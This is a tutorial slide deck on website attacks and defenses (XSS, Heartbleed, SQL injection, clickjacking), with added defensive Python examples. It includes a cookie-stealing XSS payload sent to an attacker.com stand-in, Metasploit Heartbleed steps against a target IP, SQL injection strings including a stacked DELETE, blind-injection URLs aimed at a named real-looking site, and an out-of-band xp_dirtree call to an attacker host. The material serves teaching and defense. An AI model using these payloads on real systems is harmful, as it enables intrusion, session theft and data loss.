Website hacking and prevention (All Tools,Topics & Technique )
Current Technologies
Static Websites
• Quick to develop
• Easy to host
• More secure
• Less easily hackable
• Requires web development expertise to update the site
• Site not as useful to the user
• Content can get stagnant
Dynamic Websites
• Slower/expensive to develop
• Hosting costs a little more
• Less secure
• Prone to hacking
• Many more functionalities
• Easy to update
• New content brings people back to the site and helps in the search engines
• Can work as a system to allow staff or users to collaborate
Types of Websites
• Static websites
• Dynamic websites
(Website base)
Website Technologies
• Markup Languages
HTML
CSS
XML
• Programming and Scripting Languages
JavaScript
VBScript
Php
C#
Perl
Asp.net
• Web Servers
Internet Information Services
(IIS)
Apache
• Databases
SQL Server
MYSQL
Ever come across a screen like this?
URL HIJACKING
• Make money from your mistake: they buy badly spelled domains
• Redirect from the famous URLs
• Fake website or phishing site
• Infect with a drive-by download
Types of URL hijacking
• Display hijacking
• Paid search hijacking
CLICKJACKING
• iframe
• z-index
• opacity
• position
STROKEJACKING
It is extremely similar to clickjacking, in that a malicious site has a user doing things they don't want to do. Except, this time, it's with the keyboard instead of the mouse, hence the "stroke". The attacking site gets the user to type (or cut and paste) the information the attacker is looking for. This could lead to another attack (if the user types JavaScript), or just to gathering a username and password. The user thinks they are logging into a site, but they're really sending characters over to the attacker's site.
TAPJACKING
• A hacking technique where a malicious application presents a fake user interface in order to capture user events for a hidden action in the background.
• Like clickjacking on the web, tapjacking occurs when a malicious application displays a fake user interface that seems like it can be interacted with, but actually passes interaction events such as finger taps to a hidden user interface behind it.
• Tapjacking is mostly used against mobile applications and mobile websites.
Tools and Techniques Required to Perform Attacks
 WHOIS
 Robots.txt files
 HTTrack (clone a website)
 BeEF Tool
 Electronic Data Gathering, Analysis and Retrieval (EDGAR)
 Shodan Search
 Google Hacking
 DNS Lookup
 Nslookup
 DIG (Domain Information Groper)
 Netcraft
 Httprint
 Fierce
 Encoder and Decoder
Open source tools / Commercial tools
XSS
Content
 Definition
 Types
 Process
 Live Attack
 Risks
 Counter Measures
Definition
 Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications.
 XSS enables attackers to inject client-side scripts into web pages
viewed by other users.
 A cross-site scripting vulnerability may be used by attackers to
bypass access controls such as the same-origin policy.
XSS Types
 Persistent (Stored)
Stored or Persistent XSS is a kind of XSS vulnerability where untrusted user input is processed and stored by the server in a file or database without any validation; this untrusted data is later fetched from storage and reflected back in the response without encoding or escaping, resulting in code execution in the browser whenever the stored data is included in a response.
- link in other website or email
XSS Types
 Non Persistent (Reflected)
Reflected or Non-Persistent XSS is a kind of XSS vulnerability where untrusted user input is immediately processed by the server without any validation and is reflected back in the response without encoding or escaping, resulting in code execution in the browser.
- forum, bulletin board, feedback form
XSS Types
 Local (DOM based)
DOM Based XSS is a form of client-side XSS which occurs in an environment where the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. It occurs when untrusted data supplied at the source is executed as a result of modifying the DOM "environment" in the browser. DOM XSS occurs when the untrusted data is not escaped or encoded appropriately for the context in which it is used.
- PDF Adobe Reader, Flash Player
Process
1) An attacker finds an XSS hole in a web application.
2) The attacker creates an attack URL for stealing sensitive information and disguises it so that it appears legitimate. Here it is:
<script>document.location = "http://localhost/attacker.com/redirect.php?a=" + document.cookie</script>
3) The attacker distributes the malicious XSS link via social engineering to unsuspecting users.
4) When the victim logs in, the JavaScript embedded in the malicious XSS link executes and transmits the victim's login information to the attacker.
XSS Risks
XSS can
1) Steal cookies
- Hijack the user's session
- Unauthorized access
2) Spy on what you do
3) Modify the content of the web page by
- Inserting images or words
- Misinforming
- Spreading a bad reputation
4) Network mapping
5) XSS viruses
XSS Countermeasures
1) Content Filtering:
"The application may attempt to detect and remove all scripts from un-trusted HTML before sending it to the browser." Content filtering is otherwise known as sanitization. This defense technique uses filter functions to remove potentially malicious data or instructions from user input. Filter functions are applied after user input is read by a web application, but before the input is used in an operation or output to the web browser. Removal of scripts from un-trusted content is a difficult problem for web applications that permit HTML markup in user input, such as blogs. To be completely effective in eliminating XSS, a filter function must necessarily model the full range of parsing behaviors pertaining to script execution for several browsers.
XSS Countermeasures
Challenges of Content Filtering:
Allowing all benign HTML user input while simultaneously blocking all potentially harmful scripts in the un-trusted output. Every control character that can be used to introduce attack code also has a legitimate use in some benign, non-script context. For example, the '<' character needs to be present in hyperlinks and text formatting, and the '"' character needs to be present in generic text content. Both are legitimate and allowed user inputs, but can be abused to mount XSS attacks. Browser behavior varies from browser to browser; it is complex to model, not entirely understood and not all known (especially for closed-source browsers like Microsoft Internet Explorer). Therefore, from a web application perspective, the task of implementing correct and complete content filter functions is very difficult, if not impossible.
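As an added example (not part of the slides), the following Python compares the filtering strategies just described on constructed inputs: a blacklist that strips only <script> tags, context-aware output encoding of untrusted text into an HTML text node, and an allowlist sanitizer for applications that must accept some markup. The sample inputs, the allowed tag set and all function names are this example's own assumptions.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample inputs: one benign (uses '<' and '"' legitimately, as the
# slide says real text does), three that reach script execution in different ways.
SAMPLE_INPUTS = {
    "benign": '5 < 6 and "quoted" text',
    "script_tag": "<script>alert(1)</script>",
    "event_handler": "<img src=x onerror=alert(1)>",
    "styled": "<b onclick=alert(1)>hi</b>",
}


def naive_script_filter(text):
    """Blacklist filter: strips <script> tags and nothing else. It misses every
    other route to script execution, e.g. event-handler attributes."""
    return re.sub(r"(?is)<\s*/?\s*script[^>]*>", "", text)


def encode_for_html_body(text):
    """Output encoding for an HTML text node: '<', '>', '&', '"' and "'" become
    entities, so the browser never sees a tag or attribute boundary. Benign text
    survives unchanged once the browser decodes the entities."""
    return html.escape(text, quote=True)


# Allowlist sanitizer for pages that must accept a little markup (blogs, comments).
ALLOWED_TAGS = {"b", "i", "em", "strong", "p"}


class AllowlistSanitizer(HTMLParser):
    """Re-emits only known-safe tags, drops every attribute, escapes all text.
    Unknown elements are dropped; their text content is kept as escaped text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append("<%s>" % tag)  # attributes (onclick, href, ...) never pass

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))


def sanitize_allowlist(fragment):
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


def main():
    for name, value in SAMPLE_INPUTS.items():
        print(name)
        print("  naive filter :", naive_script_filter(value))
        print("  html escape  :", encode_for_html_body(value))
        print("  allowlist    :", sanitize_allowlist(value))


if __name__ == "__main__":
    main()
```

Running it shows the point of the slide: the blacklist leaves the onerror input untouched, while encoding and the allowlist both neutralize it, and the allowlist is the only option that keeps the harmless <b> formatting.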
XSS Countermeasures
2) Browser Collaboration:
“The application may collaborate with the browser by indicating which
scripts in the web page are authorized, leaving the browser to
ensure the authorization policy is upheld.” Robust prevention of XSS
attacks can be achieved if web browsers are made capable of
distinguishing authorized from unauthorized scripts.
This approach can be implemented by
(a) creating a server–browser collaboration protocol to communicate
the set of authorized scripts, then
(b) modifying the browser to understand this protocol and enforce a
policy denying unauthorized script execution.
XSS Countermeasures
Challenges of Browser Collaboration:
Although this defense strategy is a compelling and effective long-term solution, its implementation will take a long time because web applications adopting this approach require their users to employ modified browsers for protection from XSS attacks. To implement this there must be agreement on some standards for server-browser collaboration, then these new standards must be incorporated in the normal browser implementation. This is a long, complicated process that can take several years.
Ex: Browser-Enforced Embedded Policies (BEEP)
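Added example, not from the slides: the server-browser collaboration described above has since been standardized as Content Security Policy (CSP), which browsers now ship. The Python below shows the server side (a per-response nonce and the policy header that authorizes only scripts carrying it) together with a small model of the browser's enforcement decision; the page template, the script bodies and the function names are this example's own assumptions.

```python
import re
import secrets


def make_script_nonce():
    """Fresh 128-bit random nonce per response. A predictable or reused nonce
    would let injected content claim authorization."""
    return secrets.token_urlsafe(16)


def build_csp_header(nonce):
    """Policy that authorizes only scripts carrying this response's nonce.
    frame-ancestors 'none' additionally refuses framing, which closes the
    iframe-based clickjacking vector from earlier in the deck."""
    return ("default-src 'self'; "
            "script-src 'nonce-%s'; "
            "object-src 'none'; "
            "base-uri 'self'; "
            "frame-ancestors 'none'" % nonce)


def render_page(nonce, trusted_script, untrusted_fragment):
    """The application stamps its own inline script with the nonce. untrusted_fragment
    stands in for content an attacker managed to inject; it cannot know the nonce."""
    return ('<html><body>'
            '<script nonce="%s">%s</script>'
            '<div class="user-content">%s</div>'
            '</body></html>' % (nonce, trusted_script, untrusted_fragment))


SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.S | re.I)
NONCE_ATTR = re.compile(r'\bnonce="([^"]*)"')


def scripts_the_browser_would_run(page_html, csp_header):
    """Model of the browser's side of the collaboration: read the nonce from the
    policy, then allow exactly those <script> elements whose nonce attribute matches.
    Returns a list of (script body, allowed) pairs."""
    m = re.search(r"script-src 'nonce-([^']+)'", csp_header)
    policy_nonce = m.group(1) if m else None
    decisions = []
    for attrs, body in SCRIPT_TAG.findall(page_html):
        n = NONCE_ATTR.search(attrs)
        tag_nonce = n.group(1) if n else None
        allowed = (policy_nonce is not None and tag_nonce is not None
                   and secrets.compare_digest(tag_nonce, policy_nonce))
        decisions.append((body, allowed))
    return decisions


def demo():
    nonce = make_script_nonce()
    header = build_csp_header(nonce)
    # constructed: one authorized script, one injected script without a nonce
    page = render_page(nonce, "initApp();", "<script>stealCookies()</script>")
    return scripts_the_browser_would_run(page, header)


if __name__ == "__main__":
    for body, allowed in demo():
        print("allowed" if allowed else "blocked", body)
```

The decision does not depend on recognizing the injected script as malicious; anything the server did not explicitly authorize is refused, which is what makes the approach robust where content filtering is not.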
HEARTBLEED
Heartbleed is a security bug in the OpenSSL cryptography library.
OpenSSL is a software library to be used in applications that need to secure communications over computer networks against eavesdropping or need to ascertain the identity of the party at the other end.
It has found wide use in internet web servers, serving a majority of all web sites.
OpenSSL contains an open-source implementation of the SSL and TLS protocols.
The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols are the most widely deployed security protocols used today. Essentially, they provide a secure channel between two machines operating over the Internet or an internal network.
What happened?
 The Heartbleed vulnerability was announced to the world on 7th April 2014 as an OpenSSL vulnerability, together with a new code release (1.0.1g)
 It was found by the Google Security Team and Codenomicon
 It was reported that private keys for SSL certificates could be exposed
 Many big-name companies were vulnerable: big tech names, banks, law enforcement, intelligence agencies
 But...
What is heartbeat extension?
 Heartbeat is an echo functionality where either side
(client or server) requests that a number of bytes of data
that it sends to the other side be echoed back.
 The idea appears to be that this can be used as a keep-
alive feature, with the echo functionality presumably
meant to allow verifying that both ends continue to
correctly handle encryption and decryption
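Added example, not part of the slides: a small Python model of the heartbeat echo described above, showing the one bounds check whose absence was Heartbleed. The message layout (type byte, 16-bit payload length, payload, 16 bytes of padding) follows RFC 6520; the "memory after the record" buffer, the function names and the sample secret are constructed for this example.

```python
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
HEADER_LEN = 1 + 2          # type byte + 16-bit payload_length
PADDING_LEN = 16            # RFC 6520 requires at least 16 bytes of padding

# Constructed stand-in for whatever sat in process memory right after the
# received record (the kind of data the slides say leaked).
MEMORY_AFTER_RECORD = b"Cookie: session=abc123; password=hunter2"


def build_heartbeat(payload, claimed_length=None):
    """Encode a heartbeat request. claimed_length normally equals len(payload);
    passing a different value models a malformed message."""
    if claimed_length is None:
        claimed_length = len(payload)
    return struct.pack("!BH", HB_REQUEST, claimed_length) + payload + b"\x00" * PADDING_LEN


def echo_unchecked(record, memory_after):
    """Behaviour before OpenSSL 1.0.1g: trust payload_length and copy that many
    bytes starting at the payload, whatever happens to follow the record in memory."""
    _, claimed = struct.unpack("!BH", record[:HEADER_LEN])
    buffer = record + memory_after          # the copy is not bounded by the record
    echoed = buffer[HEADER_LEN:HEADER_LEN + claimed]
    return struct.pack("!BH", HB_RESPONSE, claimed) + echoed


def echo_checked(record, memory_after):
    """The fix: discard any message whose claimed payload (plus padding) does not
    fit inside the bytes actually received. memory_after is never read because the
    copy is bounded by the record. Returns None when the message is discarded."""
    if len(record) < HEADER_LEN + PADDING_LEN:
        return None                          # too short to be a valid heartbeat
    _, claimed = struct.unpack("!BH", record[:HEADER_LEN])
    if HEADER_LEN + claimed + PADDING_LEN > len(record):
        return None                          # silently drop, as the patched code does
    echoed = record[HEADER_LEN:HEADER_LEN + claimed]
    return struct.pack("!BH", HB_RESPONSE, claimed) + echoed


def leaked_from(response, claimed, true_payload_len):
    """Bytes in a response that were not part of the request payload."""
    return response[HEADER_LEN + true_payload_len:HEADER_LEN + claimed]


if __name__ == "__main__":
    ok = build_heartbeat(b"hi")
    bad = build_heartbeat(b"hi", claimed_length=60)   # constructed malformed message
    print("well-formed, checked  :", echo_checked(ok, MEMORY_AFTER_RECORD))
    print("malformed, checked    :", echo_checked(bad, MEMORY_AFTER_RECORD))
    print("malformed, unchecked  :", echo_unchecked(bad, MEMORY_AFTER_RECORD))
```

The malformed message is 21 bytes long but claims a 60-byte payload; the unchecked echo returns 58 bytes of whatever followed the record, the checked version returns nothing, which is why the 1.0.1g patch and the "disable the heartbeat extension" advice later in the deck both close the hole.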
Background
The Heartbleed vulnerability is possibly the worst thing that ever happened
to online trust. Ironically, Heartbleed makes HTTPS less secure than plain
HTTP because attackers can obtain sensitive data without even having to
intercept traffic.
Initial reactions focused on :
• patching vulnerable web servers,
• revoking SSL certificates
• changing user passwords.
It took a couple more days to realize that Heartbleed also affects client
software, non-web SSL traffic and countless embedded devices which
will never receive a software update.
Let's see how to perform this attack with Metasploit!
 It can be performed with the powerful exploit framework Metasploit
 We'll see how it's performed step by step
 Step 1: Update Metasploit using msfupdate
 Step 2: Start Metasploit
 Kali > msfconsole
 Step 3: Find Heartbleed
 search heartbleed
 This brings up two modules:
 auxiliary/scanner/ssl/openssl_heartbleed
 and
 auxiliary/server/openssl_heartbeat_client_memory
 We'll use the first one
Step 4
 Use the auxiliary module
 use auxiliary/scanner/ssl/openssl_heartbleed
 This will load the heartbleed module
 Type
msf > info
 This reveals the options that need to be set in order to use this module, and a description of the module
Step 5
 Set options
 Although this module has numerous options, the critical one is RHOSTS
 Let's set it to a target website on the network that is still vulnerable to Heartbleed
 msf > set RHOSTS 192.168.1.169
Step 6: Run the module
 Finally, set the option 'verbose' to 'true'. This will provide us with verbose output.
msf > set verbose true
 And let's run it
msf > run
 As we can see in the next screenshot, the server leaked about 64k bytes of what was in its memory
Success!
Let Us Define….
• Alice, Bob: Users of online services.
• Eve: A passive attacker (eavesdropper).
• Trudy: An active attacker who may exploit the Heartbleed bug by sending specially crafted heartbeat packets over an SSL (e.g. HTTPS) connection.
• yuri.com: A web site with vulnerable SSL software.
Since OpenSSL is so widely used, any web site should be
considered as a potential yuri.com until proven otherwise.
Attack patterns and
countermeasures
1. Extraction of sensitive data from vulnerable HTTPS servers
In this scenario Alice enters or consults sensitive data on yuri.com over HTTPS. Plain-text data lingers in the memory of the web server. Later, Trudy connects as a regular HTTPS client and exploits Heartbleed.
Countermeasures for end users
• Do not exchange sensitive information with a web site
until they tell you they have dealt with Heartbleed.
Field reports
• Canadian charged in 'Heartbleed' attack on tax agency.
2. Session hijacking from vulnerable HTTPS servers
In this scenario Trudy extracts session cookies rather than
login credentials. This allows her to take control of Alice's
account without waiting for her to enter her credentials.
Countermeasures for end users
• Log out of online services until they have dealt with
Heartbleed.
3. Extraction of SSL private keys from vulnerable
HTTPS servers
In this scenario Trudy extracts the SSL/TLS private key of
yuri.com. Regardless of what happens next, leakage of
private keys is always a major failure.
Lessons learned
• Protect private keys with a hardware security module.
Field reports
• Confirmed: Heartbleed Exposes Web Server's Private
SSL Keys
4. Man-in-the-middle impersonation of online services
In this scenario mallory.com impersonates yuri.com after extracting its SSL private key. This so-called man-in-the-middle attack (MITM) is more dangerous than passive snooping because mallory.com can trick Alice into using a compromised certificate. It also allows mallory.com to defeat some multi-factor security measures.
Countermeasures for end users
• Check whether your browser detects revoked certificates.
• If it does not, inspect certificates manually.
Lessons learned
• Heartbleed will probably be the end of the current certificate revocation infrastructure.
5. Tor traffic correlation
Eve, an evil dictator, wants to establish that Alice is using Tor to communicate with george.com, a foreign human-rights organization. Eve can spy on all Internet traffic within her national boundaries but has no wiretapping authority in other countries. She exploits Heartbleed massively against vulnerable Tor exit nodes in order to match outgoing traffic with her local intercepts.
6. De-anonymization of hidden servers and users by
malicious Tor nodes
Trudy sets up a number of malicious Tor guard nodes. She exploits the Heartbleed vulnerability against clients that connect to them, including Tor hidden servers and their users. Although Tor hidden services are encrypted end-to-end, Trudy can identify vulnerable users and servers based on plaintext data leaked by Heartbleed at each end. Besides, if she extracts the private key of a hidden service, she can impersonate it.
Field reports
• "Tor hidden services might leak their long-term hidden
service identity keys to their guard relays."
7. Attacks against VPN servers
Alice is aware that most public WiFi networks provide no
privacy. Therefore she has configured her smartphone
and laptop to connect to the Internet through a VPN
service provider, yuri.com. (Alternatively, she could be
running her own VPN server at home, or using the VPN
feature that comes bundled with her DSL modem or her
NAS box.) Eve snoops on the WiFi network that Alice is
currently using, notices SSL-based VPN traffic from her
smartphone, exploits Heartbleed against the destination
IP address, and retrieves either VPN keys or plaintext
traffic.
Field reports
• Attackers Exploit the Heartbleed OpenSSL Vulnerability
to Circumvent Multi-factor Authentication on VPNs
• OpenVPN uses OpenSSL as its crypto library by default
and thus is affected
Some General
Countermeasures
 Do not use OpenSSL 1.0.1f.
 Disable heartbeat extension.
 Change login credentials if your site is compromised.
DANGER :
OpenSSL, an open source project staffed by only 10
individuals and run on a limited budget, is used to secure
millions of servers, ensuring the integrity of email, e-
commerce, online banking and other properties, in many
cases for multi-billion dollar companies.
Heartbleed obviously has wide-reaching implications, not
only for the integrity of the Web, but also for mobile apps –
but how much damage did it actually do prior to its
discovery and patching?
How damaging is Heartbleed?
The issue has also spread to mobile devices. Android
apps, for instance, may connect to servers that could be
affected by Heartbleed. While not dedicated browsing
tools such as Google Chrome or Apple Safari, some of
these apps have their own internal browsers, blurring the
line between mobile software and the Web. That risk is
worth noting, not just for the OpenSSL exploit but for
future considerations about overall Internet security.
Looking ahead…
These weaknesses are all addressable, and the
speed with which companies and security experts
have acted has been encouraging. Still, the
community will have to stay on its toes to protect the
emerging Internet of Everything from OpenSSL and
future bugs.
SQL Injection Attack
What is SQL?
SQL (Structured Query Language) is a programming language used to manage databases.
The management systems that employ SQL are Microsoft SQL Database, Oracle, MySQL, PostgreSQL, and others.
What is SQL Injection?
SQL injection (SQLi) refers to an injection attack in which the attacker executes malicious SQL queries that control a web application's database server.
The attacker can use SQL injection to :
 Add, delete, edit or read content from the database
 Read source code from files on the database server
 Write files to the database server
Classification of SQL injections
There are 3 major classifications:
1. In-band SQLi (Classic SQLi)
2. Inferential SQLi (Blind SQLi)
3. Out-of-band SQLi
In-Band SQLi or Classic Attacks
Most attacks rely on basic SQL manipulation and are considered to be classic attacks. This includes
 WHERE clause modification
 UNION operator injection
 query stacking
WHERE Clause Manipulation: User input generally ends up in a WHERE clause of the database query.
Example:
In a login page where a username is entered, the SQL query looks like this:
 "SELECT * FROM users WHERE name = '" + userName + "';"
 If the "userName" variable is crafted in a specific way, the SQL statement may do more than the code author intended. Setting the "userName" variable as:
' OR '1'='1
 or using comments to even block the rest of the query:
' OR '1'='1' --
These user inputs render the SQL query like the following:
 SELECT * FROM users WHERE name = '' OR '1'='1';
 SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
SQL injection Using UNION: The UNION operator allows the attacker to extract sensitive information from the database.
 Example:
USER INPUT:
 ' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a
GENERATED QUERY:
 SELECT id, name, description FROM products WHERE category = '' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a'
The crafted query returns usernames and passwords of all members in the database.
 Query stacking: Stacked queries provide a lot of control to the attacker. By terminating the original query and adding a new one, it will be possible to modify data and call stored procedures.
 Example
A classic attack using this technique could look like the following.
MALICIOUS USER INPUT:
 1; DELETE FROM products
GENERATED QUERY WITH MULTIPLE STATEMENTS:
 SELECT * FROM products WHERE productid=1; DELETE FROM products
Inference SQLi attack
The main intent of the attacker in an inference SQLi is identifying the injectable parameters and extracting the database schema.
Here no data is actually transferred via the web application, and the attacker would not be able to see the result of an attack in-band. It is also referred to as a Blind injection attack.
There are two well-known attack techniques that are based on inference:
 Boolean-based blind injection
 Time-based blind attacks
Boolean-based blind injection: Information is inferred from the behaviour of the page by asking the server true/false questions. If the injected statement evaluates to true, the site continues to function normally. If the statement evaluates to false, although there is no descriptive error message, the page differs significantly from the normally functioning page.
Example:
In this website it shows some information which is stored in some database
http://www.psn.com.pk/index.php?page=gallery.php&id=519
The attacker finds the vulnerability using Boolean based blind injection
False query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=2
True query:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=1
Time-based blind attack: For time-based attacks, the attacker needs to instruct the database to perform a time-intensive operation. If the web site does not return a response immediately, the web application is vulnerable to blind SQL injection. A popular time-intensive operation is the sleep operation.
Example:
In the website
http://www.psn.com.pk/index.php?page=gallery.php&id=519
To perform time based blind attack the query will become:
http://www.psn.com.pk/index.php?page=gallery.php&id=519 and if(1=1,
sleep(10), false)
Out-of-band SQLi
 An out-of-band attack occurs when the attacker is unable to use the same channel to attack and gather results
 Out-of-band techniques offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable.
Consider the following URL crafted by an attacker:
https://example.com/products.aspx?id=1;EXEC master..xp_dirtree 'test.attacker.com' --
This will produce the following SQL query.
 SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree 'test.attacker.com' --
 What happened is that there are now two separate queries that SQL Server will execute.
/* First Query */
 SELECT * FROM products WHERE id=1
/* Second Query */
 EXEC master..xp_dirtree 'test.attacker.com' --
 The second query invokes the stored procedure xp_dirtree. This extended stored procedure can be used to get a list of all the folders under the folder named in the call.
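The boolean, time-based and out-of-band requests shown in the preceding sections leave recognizable traces in web server logs. As an added example (not from the slides), the Python below runs a few detection rules over constructed access-log lines shaped like the deck's own examples; the log lines, IP addresses, rule names and the assumption that the id parameter must be an integer are all this example's constructions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (combined log format); hosts, IPs and times are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2014:12:00:01 +0000] "GET /index.php?page=gallery.php&id=519 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Apr/2014:12:00:02 +0000] "GET /index.php?page=gallery.php&id=519%20and%201=2 HTTP/1.1" 200 311
203.0.113.5 - - [10/Apr/2014:12:00:03 +0000] "GET /index.php?page=gallery.php&id=519%20and%20if(1=1,%20sleep(10),%20false) HTTP/1.1" 200 5120
198.51.100.7 - - [10/Apr/2014:12:00:04 +0000] "GET /products.aspx?id=1;EXEC%20master..xp_dirtree%20'test.attacker.com'%20-- HTTP/1.1" 500 98
198.51.100.9 - - [10/Apr/2014:12:00:05 +0000] "GET /search?q=red%20and%20blue HTTP/1.1" 200 2048
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Each rule is matched against the URL-decoded query string.
RULES = [
    ("boolean-blind", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("time-based", re.compile(r"\bsleep\s*\(|\bwaitfor\s+delay\b|\bbenchmark\s*\(", re.I)),
    ("stacked-or-oob", re.compile(r";\s*exec\b|\bxp_\w+", re.I)),
    ("comment-terminator", re.compile(r"--\s*$|/\*")),
]
# Assumption for this example: the application expects these parameters to be integers,
# so any other shape is worth flagging even if no signature matched.
NUMERIC_PARAMS = {"id"}


def analyze_request(method, url):
    """Return the list of rule names that fire for one request."""
    findings = []
    parts = urlsplit(url)
    decoded_query = unquote_plus(parts.query)
    for name, pattern in RULES:
        if pattern.search(decoded_query):
            findings.append(name)
    params = parse_qs(parts.query, keep_blank_values=True)
    for p in NUMERIC_PARAMS:
        for value in params.get(p, []):
            if not value.strip().isdigit():
                findings.append("non-numeric-" + p)
    return findings


def analyze_log(text):
    """Parse each log line and attach the findings for its request."""
    results = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, _ts, method, url, status, _size = m.groups()
        results.append({"ip": ip, "status": int(status), "url": url,
                        "findings": analyze_request(method, url)})
    return results


if __name__ == "__main__":
    for entry in analyze_log(SAMPLE_LOG):
        if entry["findings"]:
            print(entry["ip"], entry["status"], entry["findings"], entry["url"])
```

The signatures are deliberately narrow (the "red and blue" search is not flagged); the structural check on the id parameter is what catches variants the signatures miss, which is the same reasoning behind the allowlist validation advice later in the deck.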
SQL Injection (SQLi)
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application's database server (also commonly referred to as a relational database management system, RDBMS).
How SQL Injection works
SELECT id FROM users WHERE username='username' AND password='password' OR 1=1'

# Define POST variables
uname = request.POST['username']
passwd = request.POST['password']
# SQL query vulnerable to SQLi
sql = "SELECT id FROM users WHERE username='" + uname + "' AND password='" + passwd + "'"
# Execute the SQL statement
database.execute(sql)
What's the worst an attacker can do with SQL?
 Bypass authentication or even impersonate specific users.
 Allow the complete disclosure of data residing on a database server.
 Alter data, which affects data integrity and could cause repudiation issues, for instance issues such as voiding transactions, altering balances and other records.
 Delete records from a database.
 Allow arbitrary execution of operating system commands on the database server.
What is a SQL Injection Vulnerability?
 Non-Technical Explanation
 Drive through <route> and <where should the bus stop?> if <when should the
bus stop?>.
 Drive through route 66 and stop on bus stops if there are people on the bus
stops.
 Drive through route 66 and do not stop on bus stops and ignore the rest of this
form. if there are people on the bus stop.
What is a SQL Injection Vulnerability?
 Technical Explanation
 $statement = "SELECT * FROM users WHERE username = 'bob' AND password = 'mysecretpw'";
 $statement = "SELECT * FROM users WHERE username = '$user' AND password = '$password'";
Different Types of the SQL Injection
Vulnerability
 Error based SQL Injection
 Boolean Based SQL Injection
 Time based SQL Injection
 Out-of-Band SQL Injection Vulnerability
Impacts of the SQL Injection
Vulnerability
 Add, delete, edit or read content from the database
 Read source code from files on the database server
 Write files to the database server
Preventing SQL Injection Vulnerabilities
 Server-side scripting languages are not able to determine whether or not the SQL query string is malformed; all they can do is send a string to the database server and wait for the interpreted response.
 When developing web applications you should use prepared statements to prevent SQL injection. When using prepared statements the structure and data are separated and can be interpreted by the SQL server without risking that an attacker is able to change the structure of the SQL query for malicious purposes.
What Can Be Done to Prevent SQL
Injection Attacks?
 sanitization
 validation
Sanitization
 Sanitization usually involves running any submitted data through a function (such as MySQL's mysql_real_escape_string() function) to ensure that any dangerous characters (like the single quote ') are not passed to a SQL query in data.
Validation
 attempts to ensure that the data submitted is in the form that is
expected. At the most basic level this includes ensuring that e-mail
addresses contain an "@" sign, that only digits are supplied when
integer data is expected, and that the length of a piece of data
submitted is not longer than the maximum expected length
Two ways:
 by blacklisting dangerous or unwanted characters (although
hackers can often get around blacklists)
 by whitelisting only those characters that are allowed in a given
circumstance, which can involve more work on the part of the
programmer
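Added example, not from the slides, covering the WHERE-clause example from earlier in the deck and the three prevention techniques just listed: the concatenated login query beside its prepared-statement form (run against an in-memory SQLite table), plus allowlist validation for a username and for the integer id parameter the deck's blind-injection URLs abuse. The table contents, the allowed username shape and the function names are this example's own assumptions.

```python
import re
import sqlite3


def make_demo_db():
    """Constructed in-memory users table standing in for the slides' 'users' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "wonderland"), ("bob", "builder")])
    conn.commit()
    return conn


def login_concatenated(conn, username, password):
    """The vulnerable pattern from the slides: user input becomes part of the
    query's structure, so a quote in the input rewrites the WHERE clause."""
    sql = ("SELECT id FROM users WHERE name = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_prepared(conn, username, password):
    """Prepared statement: the structure is fixed at parse time and the values
    travel separately, so the same input is compared as a literal string."""
    sql = "SELECT id FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# Validation by allowlist: accept only the shape the application expects.
# Assumption: usernames are 1-32 characters of letters, digits, '_', '.' or '-'.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def validate_username(value):
    return bool(USERNAME_RE.match(value))


def validate_product_id(value):
    """Return the integer id, or None if the parameter is not a plain integer.
    Anything like '519 and 1=1' never reaches the query."""
    value = value.strip()
    if not value.isdigit() or len(value) > 9:
        return None
    return int(value)


def demo():
    conn = make_demo_db()
    injected = "' OR '1'='1' --"     # the comment variant from the slides
    return {
        "vulnerable": login_concatenated(conn, injected, "anything"),
        "prepared": login_prepared(conn, injected, "anything"),
        "legit": login_prepared(conn, "alice", "wonderland"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
    print(validate_product_id("519"), validate_product_id("519 and 1=1"))
```

With the concatenated query the injected username matches every user; with the prepared statement it matches none, and validation rejects it before any query is built. Validation is a complement, not a substitute: the prepared statement is what keeps structure and data apart.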
Other ways of prevention
 Trust no-one
 Don't use dynamic SQL when it can be avoided
 Firewall
 Update and patch
 Reduce your attack surface
 Use appropriate privileges
 Keep your secrets secret
 Don't divulge more information than you need to
Phishing
Phreaking + Fishing = Phishing
{Phreaking = making phone calls for free back in the 1970s}
Phishing is the act of sending an email to a user falsely claiming to be an
established legitimate enterprise in an attempt to scam the user into
surrendering private information that will be used for identity theft.
What is Phishing?
Target by sector
